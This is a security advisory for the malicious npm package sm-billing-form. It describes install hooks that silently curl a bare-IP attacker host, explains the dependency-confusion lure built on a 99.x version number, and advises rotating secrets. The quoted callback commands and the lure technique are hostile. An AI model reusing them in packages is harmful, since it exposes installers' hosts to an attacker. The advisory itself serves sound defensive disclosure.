MAL-2026-14395

    Dashboard / Malicious Package / MAL-2026-14395

    MAL-2026-14395

    Published: 23 Aug 2026Last Modified: 24 Aug 2026Aliases: 
    GHSA-5fmw-xf3x-g32g

    Summary: Malicious code in sm-billing-form (npm)

    Details: Source: amazon-inspector (422b9f6c71b124deff27a41ef4b595c308595c14af77dbd3756de0e625f86fc2) package.json defines preinstall and postinstall lifecycle scripts that run `curl -s http://16.192.173.5/sm-billing-form/pre` and `curl -s http://16.192.173.5/sm-billing-form/post` on `npm install`. The requests target a hardcoded bare-IP endpoint over cleartext HTTP with no relationship to any documented publisher, and fire automatically as part of the default install. The pattern is a dependency-confusion / typosquat probe: the callback confirms to the operator of 16.192.173.5 which environments resolved the public `sm-billing-form` name and installed it, disclosing source IP and install timing and enabling targeted follow-on attacks against those hosts. The version number (99.0.0) is consistent with a dependency-confusion lure intended to outrank an internal package of the same name. Source: ghsa-malware (05532377799ac53b2d8c7d981cf5c4714e656a575a24ff5fe28255b6b72a211e) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. Source: ossf-package-analysis (a67679a3ead3448ddc6b3e62b9dac763b12cf129253be8ae5a4678962db8b4df) The OpenSSF Package Analysis project identified 'sm-billing-form' @ 99.0.1 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.

    Affected packages

    Package

    Name: sm-billing-form

    Purl: pkg:npm/sm-billing-form

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    99.0.0
    99.0.1
    MAL-2026-14395 | CVE-DB